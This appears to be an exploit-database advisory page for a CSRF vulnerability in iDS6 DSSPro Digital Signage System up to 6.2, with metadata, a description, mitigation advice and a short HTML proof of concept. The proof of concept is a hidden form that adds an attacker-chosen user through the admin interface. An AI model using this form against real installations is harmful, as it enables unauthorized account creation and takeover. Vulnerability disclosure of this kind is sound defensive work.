header-logo
Suggest Exploit
vendor:
iDS6 DSSPro Digital Signage System
by:
LiquidWorm
7.5
CVSS
HIGH
Cross-Site Request Forgery (CSRF)
352
CWE
Product Name: iDS6 DSSPro Digital Signage System
Affected Version From: V4.3
Affected Version To: V6.2 B2014.12.12.1220
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Microsoft Windows XP, Microsoft Windows 7, Microsfot Windows Server 2008, Microsoft Windows Server 2012, Microsoft Windows 10, Apache Tomcat/8.0.44, Apache Tomcat/6.0.35, Apache-Coyote/1.1, Apache Axis/1.4, MySQL 5.5.25, Java 1.8.0
2020

iDS6 DSSPro Digital Signage System 6.2 – Cross-Site Request Forgery (CSRF)

The iDS6 DSSPro Digital Signage System 6.2 allows users to perform actions via HTTP requests without validity checks, leading to potential CSRF attacks. An attacker can exploit this vulnerability to perform actions with administrative privileges when a logged-in user visits a malicious website.

Mitigation:

Implement CSRF protection mechanisms such as anti-CSRF tokens, origin validation, and referer validation. Regularly update to the latest version of the software.
Source

Exploit-DB raw data:

# Exploit Title: iDS6 DSSPro Digital Signage System 6.2 - Cross-Site Request Forgery (CSRF)
# Date: 2020-07-16
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.yerootech.com
# Version: 6.2

iDS6 DSSPro Digital Signage System 6.2 Cross-Site Request Forgery (CSRF)


Vendor: Guangzhou Yeroo Tech Co., Ltd.
Product web page: http://www.yerootech.com
Affected version: V6.2 B2014.12.12.1220
                  V5.6 B2017.07.12.1757
                  V4.3

Summary: iDS6 Software's DSSPro network digital signage management system
is a web-based server software solution for Windows.

Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.

Tested on: Microsoft Windows XP
           Microsoft Windows 7
           Microsfot Windows Server 2008
           Microsoft Windows Server 2012
           Microsoft Windows 10
           Apache Tomcat/8.0.44
           Apache Tomcat/6.0.35
           Apache-Coyote/1.1
           Apache Axis/1.4
           MySQL 5.5.25
           Java 1.8.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2020-5606
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5606.php


16.07.2020

--


Add user:
---------

<html>
  <body>
    <form action="http://192.168.1.88/Pages/user!addUser" method="POST">
      <input type="hidden" name="user.userName" value="testingus" />
      <input type="hidden" name="user.password" value="zeroscience" />
      <input type="submit" value="add()" />
    </form>
  </body>
</html>